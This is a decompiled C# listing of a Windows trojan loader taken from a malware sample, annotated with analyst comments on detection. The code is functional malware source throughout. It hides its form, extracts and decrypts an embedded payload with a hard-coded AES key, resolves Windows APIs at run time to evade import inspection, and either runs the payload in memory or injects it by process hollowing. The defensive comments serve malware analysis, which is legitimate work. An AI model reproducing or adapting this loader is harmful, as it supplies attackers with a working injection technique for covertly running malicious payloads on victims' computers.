// Decompiled with JetBrains decompiler
|
|
// Type: Yi0GE2NLaKY9cPmB45.l1YmlpPMvQyqqZeffw
|
|
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
|
|
|
|
using lIMo5cXu7QVSJ7hdyJ;
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.ComponentModel;
|
|
using System.Diagnostics;
|
|
using System.Drawing;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Runtime.CompilerServices;
|
|
using System.Runtime.InteropServices;
|
|
using System.Security.Cryptography;
|
|
using System.Text;
|
|
using System.Threading;
|
|
using System.Windows.Forms;
|
|
using TmwCXiWu118CwLLcBx;
|
|
|
|
namespace Yi0GE2NLaKY9cPmB45
|
|
{
|
|
// Analyst summary (defensive annotation of decompiled, name-obfuscated code):
// this WinForms class is a loader stub. When the form loads it reads its own executable
// file, takes a Base64 field out of it, decrypts that field with a hard-coded Rijndael
// key/IV, and then either loads the result in-process as a managed assembly or passes it
// to lElT0QhP0, whose call sequence is consistent with process hollowing
// (MITRE ATT&CK T1055.012).
// Every string literal comes from tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(int), which is defined
// outside this file, so the delimiter, the target path and the native API names cannot
// be read from this listing; where an API is named below it is inferred from the
// delegate's parameter shape and should be confirmed by dumping the string table.
[DesignerGenerated]
|
|
internal class l1YmlpPMvQyqqZeffw : Form
|
|
{
|
|
// Designer component container; only touched in Dispose.
private IContainer u0ejtRg5C;
|
|
// Not referenced anywhere in the code visible here; content is non-ASCII and looks
// encoded - purpose unknown.
private const string SXcEpLecu = "ᅕჯᅀᅕᄱᆲᆂᄐᅘᅕᆂၺᄷᅉᄢᄮᄽᆝᆲᆯᄄᆋᅿᇍᄊᄮჾᇊᅭᅘეၓᇷᆠᆋᆈᄁᆗრᅒᆻᅃᇐᆝᆗሆᇟᅿᆗဗᇱეᆻᇄሃᄥᇨᅉᇨᄢ̏Ϫ";
|
|
|
|
// Constructor: runs an external static initialiser, wires the Load event to the
// payload handler (ORG997Eyt) and applies the hidden-window layout (u1SVD5csY).
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public l1YmlpPMvQyqqZeffw()
|
|
{
|
|
// Defined outside this file and executed before the base constructor;
// presumably obfuscator/runtime initialisation - unconfirmed.
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
|
|
// ISSUE: explicit constructor call
|
|
base.\u002Ector();
|
|
// The payload logic is driven by the form's Load event, not by Main.
this.Load += new EventHandler(this.ORG997Eyt);
|
|
this.u1SVD5csY();
|
|
}
|
|
|
|
// Standard designer-generated Dispose: releases the component container when
// called with disposing == true, and always chains to the base implementation.
[DebuggerNonUserCode]
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
protected override void Dispose([In] bool obj0)
|
|
{
|
|
try
|
|
{
|
|
if (!obj0 || this.u0ejtRg5C == null)
|
|
return;
|
|
this.u0ejtRg5C.Dispose();
|
|
}
|
|
finally
|
|
{
|
|
base.Dispose(obj0);
|
|
}
|
|
}
|
|
|
|
// Renamed InitializeComponent. The property values below make the window
// effectively invisible to the user: 10x10 client area, no border, zero opacity,
// no icon, no taskbar entry, minimized. Triage note: a GUI-subsystem process whose
// only form is configured this way has no user-facing purpose.
[DebuggerStepThrough]
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
private void u1SVD5csY()
|
|
{
|
|
this.SuspendLayout();
|
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|
this.ClientSize = new Size(10, 10);
|
|
this.FormBorderStyle = FormBorderStyle.None;
|
|
// Form name is fetched from the external string table (index 190).
this.Name = tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(190);
|
|
this.Opacity = 0.0;
|
|
this.ShowIcon = false;
|
|
this.ShowInTaskbar = false;
|
|
this.WindowState = FormWindowState.Minimized;
|
|
this.ResumeLayout(false);
|
|
}
|
|
|
|
// In-memory managed execution path: loads obj0 as a .NET assembly from a byte array
// and invokes its entry point with a single string argument taken from the string
// table (index 204). This method writes nothing to disk.
// Detection note: byte-array assembly loads are observable through CLR loader
// telemetry (ETW) and, on recent .NET Framework builds, AMSI - verify coverage
// in your environment.
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
private void rSSBpBKPm([In] byte[] obj0)
|
|
{
|
|
Assembly assembly = Assembly.Load(obj0);
|
|
MethodInfo entryPoint = assembly.EntryPoint;
|
|
// The triple GetObjectValue wrapping is a VB compiler/decompiler artifact; the
// effective call is assembly.CreateInstance(entryPoint.Name).
object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name))));
|
|
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1]
|
|
{
|
|
(object) new string[1]
|
|
{
|
|
tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(204)
|
|
}
|
|
});
|
|
}
|
|
|
|
// Form.Load handler - the stub's main routine.
// Reads this process's own executable file as text and splits it on a delimiter from
// the string table (index 210). Field [1] is Base64-decoded and decrypted by
// li87Z8Ac6; field [2] is parsed as a boolean that selects the execution path.
// There is no length check on the split result, so a file with fewer than three
// fields would throw on the indexers below.
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
private void ORG997Eyt([In] object obj0_1, [In] EventArgs obj1)
|
|
{
|
|
string[] strArray = Strings.Split(File.ReadAllText(Application.ExecutablePath), tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(210));
|
|
byte[] parameter = this.li87Z8Ac6(Convert.FromBase64String(strArray[1]));
|
|
// Result is discarded - dead code left in the sample.
Encoding.GetEncoding(1252).GetBytes(strArray[1]);
|
|
if (Conversions.ToBoolean(strArray[2]))
|
|
{
|
|
// true: treat the decrypted bytes as a managed assembly and run it on a new
// thread (STA apartment is requested before start).
Thread thread = new Thread((ParameterizedThreadStart) (obj0_2 => this.rSSBpBKPm((byte[]) obj0_2)));
|
|
thread.TrySetApartmentState(ApartmentState.STA);
|
|
thread.Start((object) parameter);
|
|
}
|
|
else
|
|
// false: treat the decrypted bytes as a native PE image and pass them, with a
// string from the table (index 338), to the cross-process routine.
this.lElT0QhP0(parameter, tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(338));
|
|
}
|
|
|
|
// kernel32!LoadLibraryA imported under an obfuscated managed name.
[DllImport("kernel32", EntryPoint = "LoadLibraryA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr \u0036jCbOnaNR([MarshalAs(UnmanagedType.VBByRefStr)] ref string _param0);
|
|
|
|
// kernel32!GetProcAddress imported under an obfuscated managed name.
[DllImport("kernel32", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr pp7vagxki([In] IntPtr obj0, [MarshalAs(UnmanagedType.VBByRefStr)] ref string _param1);
|
|
|
|
// Runtime API resolver: loads library obj0, looks up export obj1 and wraps the address
// in a delegate of type T. Because of this, the only native imports visible in the
// assembly metadata are LoadLibraryA and GetProcAddress; the APIs actually used are
// hidden from static import inspection. Neither return value is checked for zero.
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public T w62GtbsBB<T>([In] string obj0, [In] string obj1) => (T) Marshal.GetDelegateForFunctionPointer(l1YmlpPMvQyqqZeffw.pp7vagxki(l1YmlpPMvQyqqZeffw.\u0036jCbOnaNR(ref obj0), ref obj1), typeof (T));
|
|
|
|
// Cross-process execution path. obj0 is parsed as a 32-bit PE image (fields are read at
// fixed offsets from the e_lfanew value at byte 60); obj1 is passed, wrapped in a
// StringBuilder, as the second argument of the first resolved function.
// The sequence of calls - start a process with flag 4, read a thread context, read and
// unmap at a remote address, allocate, write headers and sections, patch the context,
// resume - is consistent with process hollowing (T1055.012). API names below are
// inferred from parameter shapes only; the real names are Base64 strings in the
// external string table (indices 448-996).
// Returns true unless an exception is thrown; it also returns true when the first call
// fails, and the return values of the individual write calls are ignored.
// Detection note: the behaviour surfaces in endpoint telemetry as a child process
// created suspended, followed by cross-process memory allocation/writes with
// execute+write protection and a thread-context change before the first resume.
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public bool lElT0QhP0([In] byte[] obj0, [In] string obj1)
|
|
{
|
|
// Eight function pointers resolved at run time (library name, export name).
l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ obj2 = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(448))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(476))));
|
|
l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv r9hFs0ZthQaZ334oHv = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(520))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(548))));
|
|
l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX dr45xqt8vapkmdO5jX = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(600))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(628))));
|
|
l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm zfvhinbtZbMtI7F6cm = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(680))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(708))));
|
|
l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy k3lty9wFb990IxNy = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(752))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(780))));
|
|
l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD eqihWru9Nn70v7Fbd = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(832))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(860))));
|
|
l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT ayi64li1PrjMwO41Zt = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(912))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(940))));
|
|
l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg obj3 = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(976))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(996))));
|
|
bool flag;
|
|
try
|
|
{
|
|
IntPtr zero1 = IntPtr.Zero;
|
|
// Output buffers for the first call: 4 pointer-sized slots and a 68-byte block
// (sizes match 32-bit PROCESS_INFORMATION and STARTUPINFO - inferred).
IntPtr[] numArray1 = new IntPtr[4];
|
|
byte[] numArray2 = new byte[68];
|
|
// PE header fields of obj0: offset 60 = e_lfanew; +6 = section count;
// +84 = size of headers (PE32 layout assumed; no bounds or signature checks).
int int32_1 = BitConverter.ToInt32(obj0, 60);
|
|
int int16 = (int) BitConverter.ToInt16(obj0, checked (int32_1 + 6));
|
|
IntPtr num1 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 84)));
|
|
// Ten-argument call with flag value 4; shape matches CreateProcess with the
// new process started suspended - inferred, confirm from the string table.
if (obj2((string) null, new StringBuilder(obj1), zero1, zero1, false, 4, zero1, (string) null, numArray2, numArray1))
|
|
{
|
|
// 179 uints = 716 bytes with element 0 = 0x10002; matches a 32-bit thread
// CONTEXT requesting the integer registers - inferred.
uint[] numArray3 = new uint[179];
|
|
numArray3[0] = 65538U;
|
|
if (r9hFs0ZthQaZ334oHv(numArray1[1], numArray3))
|
|
{
|
|
// Address = context element 41 + 8; 4 bytes are read from it in the other
// process (presumably the image-base slot of the remote PEB - TODO confirm).
IntPtr num2 = new IntPtr(checked ((long) numArray3[41] + 8L));
|
|
IntPtr zero2 = IntPtr.Zero;
|
|
IntPtr num3 = new IntPtr(4);
|
|
IntPtr zero3 = IntPtr.Zero;
|
|
// Continue only if the remote read succeeds and the two-argument call on the
// value just read returns 0 (shape matches an unmap-view call - inferred).
if (dr45xqt8vapkmdO5jX(numArray1[0], num2, ref zero2, (int) num3, ref zero3) && obj3(numArray1[0], zero2) == 0U)
|
|
{
|
|
// +52 = preferred image base, +80 = size of image (PE32 offsets).
IntPtr num4 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 52)));
|
|
IntPtr num5 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 80)));
|
|
// 12288 = 0x3000 and 64 = 0x40; as allocation type / protection these are
// commit+reserve and read-write-execute - inferred from the call shape.
IntPtr num6 = zfvhinbtZbMtI7F6cm(numArray1[0], num4, num5, 12288, 64);
|
|
// ToInt32 ties this routine to 32-bit addresses; a zero result is not checked.
int int32_2 = num6.ToInt32();
|
|
// num7 is never assigned in this listing (decompiler artifact); it is passed
// by value as the last argument of every write call.
int num7;
|
|
// Copies the PE headers to the allocated region; result ignored.
int num8 = k3lty9wFb990IxNy(numArray1[0], num6, obj0, checked ((uint) (int) num1), num7) ? 1 : 0;
|
|
int num9 = checked (int16 - 1);
|
|
int num10 = 0;
|
|
// One iteration per section header (40 bytes each, table at e_lfanew + 248).
while (num10 <= num9)
|
|
{
|
|
int[] dst1 = new int[10];
|
|
Buffer.BlockCopy((Array) obj0, checked (int32_1 + 248 + num10 * 40), (Array) dst1, 0, 40);
|
|
// dst1[4] = raw size, dst1[5] = raw file offset, dst1[3] = virtual address.
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
|
|
Buffer.BlockCopy((Array) obj0, dst1[5], (Array) dst2, 0, dst2.Length);
|
|
num5 = new IntPtr(checked (int32_2 + dst1[3]));
|
|
num4 = new IntPtr(dst2.Length);
|
|
int num11 = k3lty9wFb990IxNy(numArray1[0], num5, dst2, checked ((uint) (int) num4), num7) ? 1 : 0;
|
|
checked { ++num10; }
|
|
}
|
|
// Writes the new base address (4 bytes) back to the location read earlier.
num5 = new IntPtr(checked ((long) numArray3[41] + 8L));
|
|
num4 = new IntPtr(4);
|
|
int num12 = k3lty9wFb990IxNy(numArray1[0], num5, BitConverter.GetBytes(num6.ToInt32()), checked ((uint) (int) num4), num7) ? 1 : 0;
|
|
// Context element 44 := allocated base + entry-point RVA (header offset +40),
// then the modified context is applied to the thread.
numArray3[44] = checked ((uint) (num6.ToInt32() + BitConverter.ToInt32(obj0, int32_1 + 40)));
|
|
int num13 = eqihWru9Nn70v7Fbd(numArray1[1], numArray3) ? 1 : 0;
|
|
}
|
|
}
|
|
// Called whenever the first call succeeded, including when the inner steps
// above were skipped (shape matches a thread-resume call - inferred).
int num14 = (int) ayi64li1PrjMwO41Zt(numArray1[1]);
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
// Any exception is swallowed and reported only as a false return value.
ProjectData.SetProjectError(ex);
|
|
flag = false;
|
|
ProjectData.ClearProjectError();
|
|
goto label_11;
|
|
}
|
|
flag = true;
|
|
label_11:
|
|
return flag;
|
|
}
|
|
|
|
// Decrypts obj0 with RijndaelManaged using a 16-byte key and 16-byte IV that are
// hard-coded below. Mode and padding are not set, so the library defaults apply.
// Analysis note: because key and IV are static, the embedded payload can be decrypted
// offline without running the sample, and the two byte sequences are usable as
// static signature material for this stub.
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public byte[] li87Z8Ac6([In] byte[] obj0)
|
|
{
|
|
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
|
|
{
|
|
// Fixed IV: 1..9 followed by 1..7.
rijndaelManaged.IV = new byte[16]
|
|
{
|
|
(byte) 1,
|
|
(byte) 2,
|
|
(byte) 3,
|
|
(byte) 4,
|
|
(byte) 5,
|
|
(byte) 6,
|
|
(byte) 7,
|
|
(byte) 8,
|
|
(byte) 9,
|
|
(byte) 1,
|
|
(byte) 2,
|
|
(byte) 3,
|
|
(byte) 4,
|
|
(byte) 5,
|
|
(byte) 6,
|
|
(byte) 7
|
|
};
|
|
// Fixed 128-bit key: 7..1 followed by 9..1.
rijndaelManaged.Key = new byte[16]
|
|
{
|
|
(byte) 7,
|
|
(byte) 6,
|
|
(byte) 5,
|
|
(byte) 4,
|
|
(byte) 3,
|
|
(byte) 2,
|
|
(byte) 1,
|
|
(byte) 9,
|
|
(byte) 8,
|
|
(byte) 7,
|
|
(byte) 6,
|
|
(byte) 5,
|
|
(byte) 4,
|
|
(byte) 3,
|
|
(byte) 2,
|
|
(byte) 1
|
|
};
|
|
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(obj0, 0, obj0.Length);
|
|
}
|
|
}
|
|
|
|
// Delegate types for the functions resolved at run time in lElT0QhP0. The API named on
// each is inferred from the parameter list and call site only - confirm against the
// decrypted string table.
// Ten parameters, BOOL return; shape matches CreateProcess (inferred).
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool \u0039klfPRdkUkcORZqXqJ(
|
|
[In] string obj0,
|
|
[In] StringBuilder obj1,
|
|
[In] IntPtr obj2,
|
|
[In] IntPtr obj3,
|
|
[MarshalAs(UnmanagedType.Bool)] bool _param5,
|
|
[In] int obj5,
|
|
[In] IntPtr obj6,
|
|
[In] string obj7,
|
|
[In] byte[] obj8,
|
|
[In] IntPtr[] obj9);
|
|
|
|
// (handle, address, buffer, size, int); used for all remote writes. Shape matches
// WriteProcessMemory (inferred); note the last parameter is passed by value here.
public delegate bool qgK3lty9wFb990IxNy(
|
|
[In] IntPtr obj0,
|
|
[In] IntPtr obj1,
|
|
[In] byte[] obj2,
|
|
[In] uint obj3,
|
|
[In] int obj4);
|
|
|
|
// (handle, address, ref buffer, size, ref count); shape matches ReadProcessMemory
// (inferred).
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool DR45xqt8vapkmdO5jX(
|
|
[In] IntPtr obj0,
|
|
[In] IntPtr obj1,
|
|
[In] ref IntPtr obj2,
|
|
[In] int obj3,
|
|
[In] ref IntPtr obj4);
|
|
|
|
// (handle, address, size, type, protection) returning a pointer; shape matches
// VirtualAllocEx (inferred).
public delegate IntPtr ZfvhinbtZbMtI7F6cm(
|
|
[In] IntPtr obj0,
|
|
[In] IntPtr obj1,
|
|
[In] IntPtr obj2,
|
|
[In] int obj3,
|
|
[In] int obj4);
|
|
|
|
// (handle, address) returning a status compared with 0 at the call site; shape matches
// an unmap-view-of-section call (inferred).
public delegate uint \u00331cnlp5hhg963mPuNg([In] IntPtr obj0, [In] IntPtr obj1);
|
|
|
|
// (thread handle) returning uint; shape matches ResumeThread (inferred).
public delegate uint Ayi64li1PRJMwO41ZT([In] IntPtr obj0);
|
|
|
|
// (thread handle, context buffer); called before the context is modified, so
// presumably GetThreadContext (inferred).
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool r9hFs0ZTHQaZ334oHv([In] IntPtr obj0, [In] uint[] obj1);
|
|
|
|
// (thread handle, context buffer); called after the context is modified, so
// presumably SetThreadContext (inferred).
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool hEqihWru9Nn70v7FBD([In] IntPtr obj0, [In] uint[] obj1);
|
|
}
|
|
}
|